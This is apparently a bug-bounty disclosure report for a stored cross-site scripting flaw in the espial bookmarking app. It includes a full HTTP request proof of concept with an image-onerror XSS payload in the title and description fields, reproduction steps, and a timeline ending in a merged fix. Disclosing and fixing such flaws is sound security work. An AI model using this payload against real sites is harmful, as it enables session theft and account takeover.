Cross-site Scripting (XSS) - Stored in jonschoning/espial

Valid

Reported on

Sep 25th 2021


Description

Stored XSS in parameter description when add url

Proof of Concept

// PoC.request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=Uf2kSChpmNkGUz1kytqnHN9zhOVX2jch7SXQn9NV7uMEcBBDttJFI4tFqtSQKbzuXneKQS6YglelqqyoxkQcFsQXU1q+VBO0PGt8xdVJj6iGur8g7LDLRBXiNgKGax30ZNZuXRpnznXjKjxbzpaXyyk7lXHV/aax+aRwUkzHQeUz0A1m88DG6OS9XPWf50serdJ8dSDjV2s6AzrLsAL2FoJfStU0JhBIbAwN+Q2mdjbGSflh8v5Qd0Mt3aerjVl84zsctWmV5tIgZHeyk9AYsyD+CLaABiNW7ZSU2xrJF+2GVcWot3tO+nvY4XHotRFFzQR8Vp6+BeJNkWY=; XSRF-TOKEN=rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
Content-Type: application/json
Content-Length: 246
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=https%3A%2F%2Fesp.ae8.org%2Fu%3Ademo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"url":"http://google.com","toread":null,"title":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","time":null,"tags":null,"slug":null,"selected":null,"private":false,"description":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","bid":null,"archiveUrl":null}

Step to Reproduct

At add url

Input description with payload : "><iMg SrC="x" oNeRRor="alert(1);">

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the jonschoning/espial team and are waiting to hear back a year ago
lethanhphuc modified the report
a year ago
Jon Schoning validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jon Schoning confirmed that a fix has been merged on 3ecb38 a year ago
Jon Schoning has been awarded the fix bounty
to join this conversation